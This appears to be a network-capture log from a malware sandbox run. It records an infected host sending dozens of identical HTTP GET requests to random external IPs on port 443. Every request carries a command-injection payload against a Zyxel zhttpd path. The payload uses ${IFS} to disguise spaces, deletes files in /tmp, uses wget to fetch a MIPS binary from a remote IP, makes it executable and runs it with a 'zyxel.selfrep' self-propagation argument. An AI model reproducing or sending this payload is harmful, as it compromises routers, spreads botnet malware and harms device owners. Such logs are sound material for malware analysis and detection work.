                                                Jan 28, 2024 10:16:43.087023973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9103192.168.2.2337820144.222.1.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.087078094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9104192.168.2.235585077.188.21.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.087088108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9105192.168.2.233417041.251.172.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.087131977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9106192.168.2.233586499.180.140.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.087133884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9107192.168.2.2356998121.45.243.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.087142944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9108192.168.2.235727874.162.3.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.087192059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9109192.168.2.23370081.164.46.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.087217093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9110192.168.2.2351040193.52.229.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.087240934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9111192.168.2.2360522166.180.158.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.089333057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9112192.168.2.234123465.237.230.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.089891911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9113192.168.2.2345006135.145.109.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.089906931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9114192.168.2.235203665.252.155.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.089937925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9115192.168.2.2357364191.215.101.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.089937925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9116192.168.2.2353352183.196.147.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.089947939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9117192.168.2.236075058.145.230.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.089982986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9118192.168.2.234103814.45.250.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090024948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9119192.168.2.2359480223.47.89.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090043068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9120192.168.2.234346853.224.149.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090068102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9121192.168.2.235814424.18.62.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090078115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9122192.168.2.233921261.248.254.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090111017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9123192.168.2.2357414201.223.177.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090152025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9124192.168.2.2343952216.19.25.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090176105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9125192.168.2.234008872.63.195.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090203047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9126192.168.2.2353940177.38.97.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090230942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9127192.168.2.234518054.26.110.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090250015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9128192.168.2.2350348168.193.231.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090253115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9129192.168.2.2352604172.244.18.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090281963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9130192.168.2.235288017.72.157.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090322971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9131192.168.2.2344958108.221.153.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090337038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9132192.168.2.234709281.94.72.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090367079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9133192.168.2.2347094174.147.199.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090394020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9134192.168.2.2358500185.107.238.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090401888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9135192.168.2.235363879.103.25.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090432882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9136192.168.2.235350825.152.21.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090480089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9137192.168.2.235266877.70.180.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090507030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9138192.168.2.2336890209.27.114.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090533972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9139192.168.2.234561024.190.232.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.090554953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9140192.168.2.2346610171.130.87.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096257925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9141192.168.2.234184838.142.57.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096296072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9142192.168.2.235329465.247.176.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096322060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9143192.168.2.2349474186.19.99.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096343040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9144192.168.2.2358614162.63.19.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096389055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9145192.168.2.2337020165.91.220.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096436024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9146192.168.2.2341320152.119.155.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096451044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9147192.168.2.2358710182.154.16.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096482038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9148192.168.2.233892499.122.218.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096513033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9149192.168.2.235714642.187.73.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096525908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9150192.168.2.234576050.69.11.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096545935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9151192.168.2.234837474.205.69.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096573114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9152192.168.2.234308687.19.38.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096585035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9153192.168.2.233397219.69.74.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096642971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9154192.168.2.235936259.171.2.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096662045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9155192.168.2.235715090.31.229.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096690893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9156192.168.2.2341406213.173.119.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096714020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9157192.168.2.233795631.188.220.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096741915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9158192.168.2.235537412.110.180.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096780062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9159192.168.2.2334692213.78.230.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096810102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9160192.168.2.234092657.26.57.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096816063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9161192.168.2.2336048179.161.73.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096851110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9162192.168.2.235048635.86.215.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096873999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9163192.168.2.234576688.34.231.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096889973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9164192.168.2.2344738157.68.73.73443
                                                TimestampBytes transferredDirectionData
